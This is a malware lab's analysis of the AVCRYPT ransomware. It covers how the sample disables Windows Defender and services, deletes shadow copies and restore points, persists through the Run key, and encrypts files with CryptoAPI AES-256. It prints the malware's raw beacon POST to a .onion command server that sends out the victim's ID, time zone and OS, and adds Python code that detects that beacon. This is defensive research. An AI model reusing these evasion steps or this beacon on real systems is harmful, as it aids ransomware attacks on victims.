Here at Sequretek Malware Analysis lab (SMA-LAB) we observed a new, clever and sophisticated ransomware variant dubbed “AVCRYPT”, which attempts to uninstall existing security software on victim PCs before carrying out its malicious activities.
AVCRYPT was discovered by cyber-security researchers including Lawrence Abrams, MalwareHunterTeam and Michael Gillespie.
Advanced Static Analysis
Tools used: IDA Pro, PEiD, Resource Hacker, etc.
Most modern malware executables are obfuscated, encrypted or packed to make them harder for anti-malware vendors to detect and analyze. Our sample is no different: as shown in figure 1 below, the resource section of the executable appears to be packed, as it has a high entropy value of 8.
After analyzing the sample further, we were able to identify file names in the resource section.
Upon further investigation, we were able to extract resources (executables and DLLs) from the Windows binary, which appear suspicious, as shown in figure 3 above.
Figure 4 gives us a clue about the sample's functionality: it may be ransomware.
The sample makes use of ShellExecuteExW to execute cmd.exe.
From the images above, we can see that it uses the Windows registry to disable Windows Defender.
The sample uses Windows wmic to delete shadow copies in order to prevent users from restoring their infected systems.
The sample makes registry changes that disable Internet Explorer's executable signature checking for downloaded files. We suspect that the sample may try to download additional malware onto the victim's PC.
The executable uses the victim's user name to create an executable named after the user. Next, it creates a bat file.
To check whether an internet connection is available on the victim's PC, it uses the InternetCheckConnection API. This shows that the sample requires an active internet connection to proceed further.
The sample uses the SRRemoveRestorePoint API, imported from SRClient.dll, to delete the restore points present on the system.
It disables the essential services shown above in order to evade detection and prevent the system from receiving Windows updates.
As shown above, the sample uses an onion website, which can be accessed via the Tor browser and which relates to figure 1.
As shown above, the Malware launches multiple cmd.exe and Sc.exe to accomplish many tasks like
The malware extracts many files, which are hidden in the resource section, to the Temp folder. It moves itself to the “AppData” location under the name of the user (e.g. steve.exe) with the hidden attribute set. It gains auto-start capability by creating a registry entry in the Run location.
Before starting the encryption process, it checks network connectivity by visiting “microsoft.com”, as shown in the screenshot above. After a successful network connection, it sends some information to the remote server, as given below.
“POST /index.php HTTP/1.1..Host: bxp44w3qwwrmuupconion:9050..User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1;WOW64; Trident/6.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)..Referer: bxp44w3qwwrmuupc.onion..Content-Type: application/x-www-form-urlencoded..Content-Length: 105..Accept-Charset: utf-8..Pragma: no-cache..Cache-Control: no-cache..Connection: keep alive….id=1824835925&k=GJhPiOAF8_V0&Zds6JYLf8CebUTpGv1068096&c=India Standard Time&o=Windows 7 Ultimate&m=L”
The POST request above clearly shows that the malware may create a unique ID for each computer it infects. It also obtains the time zone information, to find out the location, and the victim's operating system.
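The check-in request shown above can be turned into a network detection check. The following is an added example, not code from the original analysis: the function names are hypothetical, the dump's ".." is assumed to stand for CRLF, and the header list is shortened to the headers the check uses.

```python
from urllib.parse import parse_qsl

# Check-in request re-typed from the capture above, with the dump's ".." read
# as CRLF (assumption); only the headers the check needs are kept.
SAMPLE = (
    "POST /index.php HTTP/1.1\r\n"
    "Host: bxp44w3qwwrmuupconion:9050\r\n"
    "Referer: bxp44w3qwwrmuupc.onion\r\n"
    "Content-Type: application/x-www-form-urlencoded\r\n"
    "\r\n"
    "id=1824835925&k=GJhPiOAF8_V0&Zds6JYLf8CebUTpGv1068096"
    "&c=India Standard Time&o=Windows 7 Ultimate&m=L"
)

BEACON_FIELDS = {"id", "k", "c", "o", "m"}  # form field names seen in the capture


def parse_request(raw):
    """Split a raw HTTP request into (method, headers, form fields)."""
    head, _, body = raw.partition("\r\n\r\n")
    lines = head.split("\r\n")
    parts = lines[0].split()
    if len(parts) < 2:
        raise ValueError("not an HTTP request line")
    headers = {}
    for line in lines[1:]:
        name, sep, value = line.partition(":")
        if sep:
            headers[name.strip().lower()] = value.strip()
    # keep_blank_values keeps the value-less token that follows k= in the capture
    fields = dict(parse_qsl(body, keep_blank_values=True))
    return parts[0], headers, fields


def match_checkin(raw):
    """Return victim metadata if the request looks like the check-in, else None."""
    try:
        method, headers, fields = parse_request(raw)
    except ValueError:
        return None
    # Check Host and Referer: either header may carry the .onion name.
    onion = any(".onion" in headers.get(h, "").lower() for h in ("host", "referer"))
    if method != "POST" or not onion or not BEACON_FIELDS.issubset(fields):
        return None
    return {"id": fields["id"], "timezone": fields["c"], "os": fields["o"],
            # 9050 is Tor's default SOCKS port
            "tor_port": headers.get("host", "").endswith(":9050")}
```

Run against proxy or packet-capture output, a non-None result identifies the infected host's ID, time zone and operating system as reported in the request.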
The following Windows APIs were used to perform the encryption after a successful internet connection.
It opens the file using CreateFileW, then uses CryptAcquireContextW to find out the default cryptographic provider.
CryptCreateHash is used to create a hash object. CALG_MD5 is the hashing algorithm used in our case.
CryptHashData is used to hash the data.
CryptDeriveKey is used to derive the key. In our case the algorithm is CALG_AES_256.
CryptEncrypt is then finally called to complete the encryption process.
This ransomware behaves as its name suggests. It tries to lower the security of the system by deleting multiple services and uses hiding techniques to evade detection.
Be wary of suspicious, unknown files from untrusted sources.
Analysed By: Sanjeev Kumar, Priyesh Nargunde, Vidhi Patel.
Indicators of compromise